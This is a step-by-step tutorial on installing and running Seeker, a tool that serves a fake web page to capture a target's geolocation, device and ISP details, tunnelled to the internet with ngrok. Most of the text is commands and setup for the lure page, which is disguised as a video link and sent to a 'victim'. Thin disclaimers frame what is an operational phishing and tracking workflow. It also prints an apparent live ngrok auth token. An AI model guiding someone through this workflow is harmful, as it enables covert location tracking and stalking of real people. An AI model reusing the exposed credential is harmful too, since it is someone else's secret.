Finding Someone's Location with Seeker

📍 How to Use Seeker to Get Location via Social Engineering (Educational Purpose)

⚠️ Disclaimer:

This guide is for ethical hacking and cybersecurity learning only. Always obtain permission from targets. Misuse may result in legal consequences.


🛠️ What is Seeker?

Seeker is an open-source tool developed by TheWhiteH4t that can generate a fake web page to socially engineer and capture the victim’s location using their device’s geolocation feature.


🧰 Requirements

  • Linux OS (Kali Linux or Ubuntu preferred)

  • Python 3

  • Git

  • Ngrok (for hosting externally)


🪜 Step-by-Step Guide

🔹 1. Install Seeker

Open your terminal and run:

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh

🔹 2. Run Seeker

Make sure Python 3 is installed, then run:

##################
# Usage Examples #
##################

# Step 1 : In first terminal
$ python3 seeker.py

# Step 2 : In second terminal start a tunnel service such as ngrok
$ ./ngrok http 8080

###########
# Options #
###########

# Ouput KML File for Google Earth
$ python3 seeker.py -k <filename>

# Use Custom Port
$ python3 seeker.py -p 1337
$ ./ngrok http 1337

# Pre-select a specific template
$ python3 seeker.py -t 1

🌐 Setting Up External Access with Ngrok

🔹 3. Download Ngrok

Open a browser and visit https://ngrok.com. Sign in or register, then:

  • Copy the download link for Linux.

  • In the terminal, run:

curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok

🔹 4. Authenticate Ngrok

Get your auth token from your Ngrok dashboard and run:

ngrok config add-authtoken 22VSdPVkLSe5meidCxV6r4uKaSv_3BJPSS3z8PfrzhrkLLMHp

🎯 Create a Phishing Page

You can use custom templates in Seeker.

  • Seeker will ask for a YouTube video link (for disguise).

  • Paste the link when prompted.

  • Provide a site name and title (e.g., “Watch Now”, “Trending Video”).

  • Optionally, add an image URL and description.


🌍 Expose Localhost to the Internet

In a new terminal window:

ngrok http http://localhost:8080

Ngrok will generate a public forwarding link. This is the URL you will share with your "victim" (legally and ethically!).


Options:


📌 Capture Location Data

Once the target opens the link and gives browser permission:

  • Seeker logs their latitude, longitude, device info, and ISP details

  • A clickable Google Maps link will be available


📌 Note for Cybersecurity Students

This is a classic social engineering attack using a fake landing page. It’s commonly used in red teaming and penetration testing assessments to test user awareness.


🎓 Educational Use Only

Do NOT use Seeker for:

  • Stalking

  • Unauthorized tracking

  • Spying

Use it in legal penetration tests, CTFs, and lab environments only.

Last updated